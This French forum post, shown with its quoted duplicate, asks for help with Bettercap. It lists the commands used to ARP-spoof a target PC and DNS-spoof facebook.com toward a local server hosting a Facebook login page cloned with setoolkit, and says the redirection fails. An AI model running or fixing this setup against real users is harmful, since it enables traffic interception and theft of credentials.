Connexion
S'inscrire
Actualités
Quoi de neuf
Activités générales
Auteurs
Forums
Nouveaux messages
Rechercher un forum
Quoi de neuf
Nouveaux messages
Nouveaux messages de profil
Activités générales
Membres
Membres inscrits
Visiteurs actuels
Nouveaux messages de profil
Rechercher dans les messages des profils
Teams
Créé ton équipe
Quoi de neuf ?
Nouveaux messages
Rechercher un forum
Menu
Connexion
S'inscrire
Install the app
Install
Forums
Plateformes
PC et Serveurs
Linux
Aide Bettercap v2.10
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
Vous utilisez un navigateur non à jour ou ancien. Il ne peut pas afficher ce site ou d'autres sites correctement.
Vous devez le mettre à jour ou utiliser un
navigateur alternatif
.
Répondre à la discussion
<blockquote data-quote="LSK_lucas44360" data-source="post: 7346589" data-attributes="member: 816461"><p>Bonjour, Bonsoir</p><p>Voulant modifier la redirection du DNS de chez moi en local </p><p></p><p>J'ai utilisez etter.dns et ettercap sa ne marcher pas et j'avait même plus de connexion sur le reste de mon réseaux</p><p></p><p>Donc en creusant sur internet j'ai trouver un alternative a ettercap pour DNS spooffing</p><p></p><p>Donc avec Bettercap j'ai entrer les commande suivante :</p><p></p><p>get net.spoof.*</p><p>set dns.spoof.adress 192.168.1.31 // ma pages web cloner avec setoolkit sur mon résseaux local</p><p>set dns.spoof.domains facebook.com</p><p>dns.spoof on</p><p></p><p>set arp.targets 192.168.1.17 // pc cible j'ai essayer aussi sur tout le réseaux avec 192.168.1.255/24</p><p>set arp.spoof</p><p>set arp.internal true</p><p>arp.spoof on</p><p></p><p>Donc après entrez tout c'est notifications je suis rendu sur le pc 192.168.1.17 j'ai tapez facebook.com et rien se passe même pas le site facebook est ré-digérer sur 192.168.1.31</p><p>Mais fait un nslookup facebook avec cmd sur ma machine 192.168.1.17 et rien aucune trace de 192.168.1.31</p><p></p><p>Donc si quelqu’un aurez une alternatif ou une solutions sa serais sympas d'en faire part</p><p></p><p>Merci d’avance </p><p></p><p>Au revoir</p></blockquote><p></p>
[QUOTE="LSK_lucas44360, post: 7346589, member: 816461"] Bonjour, Bonsoir Voulant modifier la redirection du DNS de chez moi en local J'ai utilisez etter.dns et ettercap sa ne marcher pas et j'avait même plus de connexion sur le reste de mon réseaux Donc en creusant sur internet j'ai trouver un alternative a ettercap pour DNS spooffing Donc avec Bettercap j'ai entrer les commande suivante : get net.spoof.* set dns.spoof.adress 192.168.1.31 // ma pages web cloner avec setoolkit sur mon résseaux local set dns.spoof.domains facebook.com dns.spoof on set arp.targets 192.168.1.17 // pc cible j'ai essayer aussi sur tout le réseaux avec 192.168.1.255/24 set arp.spoof set arp.internal true arp.spoof on Donc après entrez tout c'est notifications je suis rendu sur le pc 192.168.1.17 j'ai tapez facebook.com et rien se passe même pas le site facebook est ré-digérer sur 192.168.1.31 Mais fait un nslookup facebook avec cmd sur ma machine 192.168.1.17 et rien aucune trace de 192.168.1.31 Donc si quelqu’un aurez une alternatif ou une solutions sa serais sympas d'en faire part Merci d’avance Au revoir [/QUOTE]
Insérer les citations…
Vérification
Publier la réponse
Forums
Plateformes
PC et Serveurs
Linux
Aide Bettercap v2.10
Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies.
Acceptez
En savoir plus.…